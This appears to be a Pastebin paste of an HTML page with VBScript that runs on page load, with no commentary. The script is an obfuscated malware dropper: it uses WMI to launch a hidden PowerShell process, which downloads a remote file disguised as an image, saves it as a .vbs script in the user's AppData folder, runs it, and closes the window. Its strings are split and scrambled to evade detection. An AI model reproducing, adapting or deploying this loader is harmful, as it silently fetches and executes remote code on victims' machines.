Advertisement
MestreQueda

Untitled

Jul 12th, 2020
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. <html>
  2. <head>
  3. <script language="VBScript">
  4. Sub window_onload
  5. const impersonation = 3
  6. Const HIDDEN_WINDOW = 12
  7.  
  8. sep=nFKPbQ("Wb emS crip ti ng.SW bemLo ca tor")
  9. Set Locator = CreateObject(sep)
  10. Set Service = Locator.ConnectServer()
  11. Service.Security_.ImpersonationLevel=impersonation
  12.  
  13.  
  14. separado=nFKPbQ("Win 32_ Pro cessS tart up")
  15. Set objStartup = Service.Get(separado)
  16. Set objConfig = objStartup.SpawnInstance_
  17. Set Process = Service.Get("Win32_Process")
  18. gshjgjshsjhsusyuiweiwuwiuwiuiww = "Powershell -windowstyle hidden $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://d.top4top.io/p_16553pm3x1.jpg'',$env:APPDATA+''\\''+''file.vbs'')'|D; start-process($env:APPDATA+'\\'+'file.vbs')"
  19.  
  20.  
  21. Error = Process.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, null, objConfig, intProcessID)
  22. window.close()
  23. end sub
  24.  
  25.  
  26.  
  27. Function nFKPbQ(wjkwer)
  28. nFKPbQ = Replace(wjkwer, " ", "", 1, -1)
  29. End Function
  30. </script>
  31. </head>
  32. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement